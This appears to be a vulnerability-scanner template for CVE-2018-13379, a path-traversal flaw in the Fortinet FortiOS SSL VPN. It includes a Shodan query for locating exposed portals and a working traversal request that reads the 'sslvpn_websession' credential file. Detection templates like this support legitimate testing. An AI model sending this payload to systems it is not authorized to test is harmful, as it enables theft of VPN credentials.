id: CVE-2018-13379

info:
    name: Fortinet FortiOS - Credentials Disclosure
    author: organiccrap
    severity: critical
    verified: false
    description: |
        Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal).
        SHODAN: http.html:"/remote/login" "xxxxxxxx"
    reference:
        - https://fortiguard.com/advisory/FG-IR-18-384
        - https://www.fortiguard.com/psirt/FG-IR-20-233
        - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379
        - https://blog.csdn.net/limb0/article/details/102890683
    tags: cve,cve2018,fortios,lfi,kev
    created: 2023/07/22

rules:
    r0:
        request:
            method: GET
            path: /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
        expression: response.body.bcontains(b"var fgt_lang =")
expression: r0()

